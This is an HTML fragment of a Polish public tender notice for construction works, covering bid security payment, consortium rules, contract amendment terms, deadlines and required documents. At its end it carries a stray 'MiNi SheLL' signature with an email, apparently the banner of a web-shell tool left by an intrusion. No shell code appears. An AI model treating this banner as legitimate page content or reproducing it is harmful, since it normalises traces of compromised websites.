aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.4.1) Informacje dotyczące wadium: </h3> 1. Zamawiający żąda wniesienia wadium w wysokości: 3 000,00 zł<br/>2. Wadium należy wnieść przed upływem terminu składania ofert, pod rygorem odrzucenia<br/>oferty.<br/>3. Wadium musi obejmować cały okres związania ofertą, tj. do dnia 23.12.2021 roku<br/>1) w pieniądzu,<br/>2) w gwarancjach bankowych,<br/>3) w gwarancjach ubezpieczeniowych,<br/>4) w poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z 9<br/>listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości.<br/>4. Wadium wnoszone w pieniądzu należy wpłacić przelewem na rachunek bankowy<br/>Zamawiającego: BS Nasielsk nr: 27 8226 0008 0000 1746 2000 0034 z adnotacją „Wadium –<br/>Znak sprawy: IZP.271.26.2021”<br/>5. Momentem wniesienia wadium jest chwila uznania kwoty wadium na rachunku bankowym<br/>Zamawiającego.<br/>6. Wniesienie wadium w pieniądzu za pomocą przelewu bankowego Zamawiający będzie<br/>uważać za wniesione w terminie tylko wówczas, gdy bank prowadzący rachunek Zamawiającego<br/>potwierdzi, że środki zostały zaksięgowane na koncie Zamawiającego przed upływem terminu<br/>składania ofert.<br/>7. Wadium wnoszone w formie poręczeń lub gwarancji musi być złożone jako oryginał gwarancji<br/>lub poręczenia w postaci elektronicznej.<br/>8. Dokument wadialny powinien zostać złożony wraz z ofertą, za pośrednictwem wskazanej<br/>platformy zakupowej.<br/>9. W przypadku składania przez Wykonawcę wadium w formie gwarancji, gwarancja ma być<br/>sporządzona zgodnie z obowiązującym prawem i winna zawierać następujące elementy:<br/>1) musi obejmować odpowiedzialność za wszystkie przypadki powodujące utratę wadium przez<br/>Wykonawcę określone w ustawie PZP<br/>2) z jej treści powinno jednoznacznie wynikać zobowiązanie gwaranta do zapłaty całej kwoty<br/>wadium;<br/>3) powinno być nieodwołalne i bezwarunkowe oraz płatne na pierwsze żądanie;<br/>4) termin obowiązywania poręczenia lub gwarancji nie może być krótszy niż termin związania<br/>ofertą (z zastrzeżeniem iż pierwszym dniem związania ofertą jest dzień składania ofert);<br/>5) w treści poręczenia lub gwarancji powinna znaleźć się nazwa oraz numer przedmiotowego<br/>postępowania;<br/>6) beneficjentem poręczenia lub gwarancji jest: ……...<br/>7) w przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia (art. 58 PZP),<br/>Zamawiający wymaga aby poręczenie lub gwarancja obejmowała swą treścią (tj. zobowiązanych<br/>z tytułu poręczenia lub gwarancji) wszystkich Wykonawców wspólnie ubiegających się o<br/>udzielenie zamówienia lub aby z jej treści wynikało, że zabezpiecza ofertę Wykonawców<br/>wspólnie ubiegających się o udzielenie zamówienia (konsorcjum);<br/>10. Zamawiający odrzuci ofertę Wykonawcy, jeżeli wadium nie zostało wniesione lub zostało<br/>wniesione w sposób nieprawidłowy. Terminowe wniesienie wadium (w każdej z dopuszczonych<br/>form jego wniesienia) Zamawiający sprawdzi w ramach własnych czynności proceduralnych.<br/>11. Zasady zwrotu oraz okoliczności zatrzymania wadium określa art. 98 PZP <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 1. Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia. W takim przypadku<br/>Wykonawcy ustanawiają pełnomocnika do reprezentowania ich<br/>w postępowaniu o udzielenie zamówienia albo reprezentowania w postępowaniu<br/>i zawarcia umowy w sprawie zamówienia publicznego.<br/>2. W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia:<br/>a) żaden z nich nie może podlegać wykluczeniu - każdy z Wykonawców na potwierdzenie składa<br/>Załącznik nr 2 do SWZ CZĘŚĆ A;<br/>b) każdy z Wykonawców składa Załącznik nr 2 do SWZ CZĘŚĆ B potwierdzający spełnianie<br/>warunków udziału w postępowaniu w zakresie, w którym każdy z wykonawców wykazuje<br/>spełnianie warunków udziału w postępowaniu,<br/>c) zobowiązani są oni na wezwanie Zamawiającego, złożyć dokumenty<br/>i oświadczenia, o których mowa w Rozdziale 11 ust. 4 pkt. 1, 2 SWZ, przy czym dokumenty i<br/>oświadczenia, o których mowa:<br/> w Rozdziale 11 ust. 4 pkt. 1 składa odpowiednio Wykonawca/Wykonawcy, który/którzy<br/>wskazuje/-ą spełnienie warunku, w zakresie i na zasadach opisanych w Rozdziale 10,<br/> dokumenty i oświadczenia, o których mowa w Rozdziale 11 ust. 4 pkt. 2 składa każdy z<br/>Wykonawców.<br/>3. W przypadku składania oferty przez kilku Wykonawców (wspólne ubieganie się o<br/>zamówienie), w ramach konsorcjum albo spółki cywilnej, warunek dotyczący uprawnień do<br/>prowadzenia określonej działalności gospodarczej musi spełnić co najmniej jeden z<br/>Wykonawców, z zastrzeżeniem, że Wykonawca ten będzie realizować przedmiot zamówienia,<br/>objęty reglamentacją w zakresie swobody działalności gospodarczej. Zamawiający nie<br/>dopuszcza realizacji przedmiotu zamówienia w części wymagającej licencji/koncesji przez<br/>Wykonawców nieuprawnionych -jeżeli dotyczy.<br/>4. W odniesieniu do warunków dotyczących zdolności technicznej lub zawodowej. Wykonawcy<br/>wspólnie ubiegający się o zamówienie mogą polegać na zdolnościach tych Wykonawców, którzy<br/>wykonają roboty budowlane lub usługi - do realizacji których te zdolności są wymagane - jeżeli<br/>dotyczy.<br/>5. W przypadkach, o których mowa w ust. 3 i 4, Wykonawcy wspólnie ubiegający się o<br/>zamówienie do oferty dołączą oświadczenie wskazujące, które roboty budowlane, dostawy,<br/>usługi zostaną wykonane przez każdego z członków konsorcjum – wg. wzoru Załącznik nr 7 do<br/>SWZ<br/>7. W przypadku składania oferty przez kilku Wykonawców (wspólne ubieganie się o<br/>zamówienie), w ramach konsorcjum albo spółki cywilnej, warunek zdolności technicznej lub<br/>zawodowej, Wykonawcy wspólnie ubiegający się o zamówienie mogą polegać na zdolnościach<br/>tych Wykonawców, którzy wykonają roboty budowlane lub usługi - do realizacji których te<br/>zdolności są wymagane - jeżeli dotyczy.<br/>9. W przypadku, o którym mowa w ust. 7 Wykonawcy wspólnie ubiegający się o zamówienie do<br/>oferty dołączą oświadczenie wskazujące, które roboty budowlane, dostawy lub usługi wykonają<br/>poszczególni Wykonawcy – Załącznik nr 7 do SWZ Oświadczenie stanowi część oferty i jako<br/>takie nie podlega uzupełnieniu - jeżeli dotyczy. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Tak</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> 1. Zamawiający dopuszcza zmianę umowy w formie aneksu, w sytuacji zmiany obowiązujących<br/>przepisów, jeżeli zgodnie z nimi konieczne będzie dostosowanie treści umowy do aktualnego<br/>stanu prawnego. Zmiana wymaga zgłoszenia w formie pisemnej informacji stanowiącej<br/>podstawę do wprowadzenia zmian. Zmiana ta może spowodować wydłużenie terminu<br/>wykonania prac i nie spowoduje zmiany wynagrodzenia Wykonawcy. Inicjatorem tej zmiany<br/>może być Zamawiający lub Wykonawca.<br/>2. Zamawiający dopuszcza zmianę kierownika budowy oraz innych osób biorących po stronie<br/>Wykonawcy udział w realizacji przedmiotu umowy, w sytuacji zdarzeń losowych oraz w<br/>przypadku niewywiązywania się z pełnionych obowiązków. Inicjatorem zmiany może być<br/>Zamawiający i Wykonawca. Zmiana musi nastąpić na osoby, które spełniają warunki określone<br/>w SWZ. Zmiana wymaga zgłoszenia w formie pisemnej w ciągu 3 dni od powzięcia informacji<br/>stanowiącej podstawę do wprowadzenia zmian. Zmiany te nie wpłyną na termin wykonania prac<br/>i nie spowodują zmiany wynagrodzenia Wykonawcy.<br/>3. Zamawiający, po wyrażeniu zgody, dopuszcza zmianę umowy w formie aneksu w<br/>następującym zakresie:<br/>1) wydłużenie terminu w przypadku:<br/>a) wystąpienia nieprzewidzianych warunków i zjawisk atmosferycznych (kataklizmy),<br/>b) wystąpienia siły wyższej np.: trąby powietrznej, pożaru, powodzi,<br/>c) wstrzymania budowy przez właściwy organ z przyczyn nie zawinionych przez Wykonawcę<br/>robót budowlanych, np.: dokonanie odkrywki archeologicznej, odkrycie niewybuchu, szczątków<br/>ludzkich itp.,<br/>d) wystąpienia innych nieprzewidzianych i uzasadnionych okoliczności,<br/>e) wystąpienia następstw działań administracyjnych (np. konieczności uzyskania wyroku<br/>sądowego lub innego orzeczenia sądu lub organu, którego konieczności nie przewidziano na<br/>etapie zawarcia umowy),<br/>f) konieczności przerwania robót z uwagi na wystąpienie obiektywnych przyczyn technicznych,<br/>g) wstrzymania prac budowlanych przez właściwy organ z przyczyn niezawinionych przez<br/>Wykonawcę,<br/>h) wystąpienia innych okoliczności nie powstałych z winy Wykonawcy,<br/>i) konieczności wykonania robót dodatkowych, których wykonanie jest niezbędne dla<br/>prawidłowego wykonania oraz zakończenia przedmiotu zamówienia.<br/>2) zwiększenie lub zmniejszenie wynagrodzenia w przypadku:<br/>a) konieczności wykonania robót dodatkowych, których wykonanie jest niezbędne dla<br/>prawidłowego wykonania oraz zakończenia przedmiotu zamówienia.<br/>b) ograniczenia przedmiotu zamówienia w przypadku zaistnienia uzasadnionych okoliczności, w<br/>których zbędne będzie wykonanie danej części zamówienia. W takim przypadku przewiduje się<br/>obniżenie wynagrodzenia wykonawcy na podstawie cen jednostkowych wskazanych w ofercie<br/>wykonawcy, proporcjonalnie do ograniczenia przedmiotu zamówienia, <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2021-11-24 10:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">oferty składa się za pośrednictwem platformy przetragowej , poprzez strone prowadzonego postepowania</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2021-11-24 10:05</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2021-12-23</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> Rodzaj i zakres zmian umowy oraz warunków ich wprowadzenia cd<br/>4. Inicjatorem zmiany może być Wykonawca lub Zamawiający. Zmiana wymaga zgłoszenia w<br/>formie pisemnej. Zmiana ta może spowodować zmianę terminu<br/>wykonania prac i zmianę wynagrodzenia Wykonawcy.<br/>5. Zamawiający dopuszcza zmianę jakości lub innych parametrów charakterystycznych dla<br/>danego elementu robót budowlanych lub zmianę technologii ze względu na zmianę postępu<br/>technologicznego (np. wycofanie produktu z rynku) w uzgodnieniu z Zamawiającym i dla niego<br/>korzystnych, w sytuacjach nie zawinionych przez Wykonawcę. Zmiany te nie wpłyną na termin<br/>wykonania prac i nie spowodują zmiany wynagrodzenia Wykonawcy.<br/>6. Zamawiający dopuszcza zmianę podwykonawcy. Zmiana ta nie wpłynie na termin wykonania<br/>prac i nie spowoduje zmiany wynagrodzenia Wykonawcy. Zmiana wymaga zgłoszenia w formie<br/>pisemnej w ciągu 4 dni od powzięcia informacji stanowiącej podstawę do wprowadzenia zmian.<br/>Inicjatorem zmiany może być Wykonawca.<br/>7. Dopuszcza się zmiany w umowie dotyczące wynagrodzenia Wykonawcy jeżeli zachodzi<br/>potrzeba wykonania prac nie ujętych w projekcie lub też w sytuacji zmiany projektu, jeżeli<br/>potrzeba wykonania prac lub zmian w projekcie zostanie potwierdzona przez inspektora nadzoru<br/>w protokole konieczności. Zamawiający przewiduje w tym zakresie możliwość udzielenia<br/>zamówienia na roboty dodatkowe zgodnie z art. 455 ustawy Prawo zamówień publicznych.<br/>Dokumenty składane przez wszystkich Wykonawców do upływu terminu składania ofert:<br/>b) Formularz ofertowy – Załącznik nr 1<br/>c) oświadczenia o spełnianiu warunków udział w postępowaniu oraz dotyczące podstaw do<br/>wykluczenia o treści zgodnej z Załącznikiem nr 2 do SWZ podpisany elektronicznym podpisem<br/>kwalifikowanym, podpisem zaufanym lub podpisem osobistym, sporządzony w języku polskim, z<br/>zachowaniem postaci elektronicznej, w formacie danych, w szczególności: ,doc, .xls, .pdf,<br/>złożone odpowiednio przez wykonawcę, podmiot udostępniający zasoby, członka konsorcjum,<br/>członka spółki cywilnej<br/>d) zobowiązanie podmiotu trzeciego - dokumenty potwierdzające dysponowanie zasobami<br/>innych podmiotów na zasadach określonych w art. 118 ustawy pzp - jeśli Wykonawca polega na<br/>zdolnościach lub sytuacji innych podmiotów (wzór Załącznik nr 3 do SWZ) - jeżeli dotyczy,<br/>d) pełnomocnictwo - w przypadku gdy ofertę podpisują osoby, których upoważnienie do<br/>reprezentacji nie wynika z dokumentów rejestrowych lub w przypadku ustanowienia<br/>pełnomocnika Wykonawców wspólnie ubiegających się o udzielenie zamówienia - jeżeli dotyczy.<br/>Zgodnie z art. 99 § 1 Kodeksu cywilnego, tj.: „Jeżeli do ważności czynności prawnej potrzebna<br/>jest szczególna forma, pełnomocnictwo do dokonania tej czynności powinno być udzielone w tej<br/>samej formie&#34;, w związku z powyższym pełnomocnictwo powinno być złożone pod rygorem<br/>nieważności w oryginale w postaci dokumentu elektronicznego podpisanego elektronicznym<br/>podpisem kwalifikowanym, podpisem zaufanym lub podpisem osobistym lub elektronicznej kopii<br/>poświadczonej za zgodność z oryginałem przez notariusza przy użyciu kwalifikowanego podpisu<br/>elektronicznego,<br/>e) odpis lub informacja z Krajowego Rejestru Sądowego lub z Centralnej Ewidencji i Informacji o<br/>Działalności Gospodarczej, sporządzony nie wcześniej niż 3 miesiące przed jej złożeniem, jeżeli<br/>odrębne przepisy wymagają wpisu do rejestru lub ewidencji, lub wskazanie źródła w Załączniku<br/>nr 2 – Oświadczenie wstępne, z którego Zamawiający może je pobrać.<br/>f) wadium jeśli jest składane w formie niepieniężnej,<br/>g) Oświadczenie na podstawie art. 117 ust. 4 PZP w przypadku wykonawców wspólnie<br/>ubiegających się o udzielenie zamówienia w zakresie wymagań określonych w Rozdziale 10 ust.<br/>6, w którym dany członek konsorcjum spełnia – Załącznik nr 7.

Creat By MiNi SheLL
Email: jattceo@gmail.com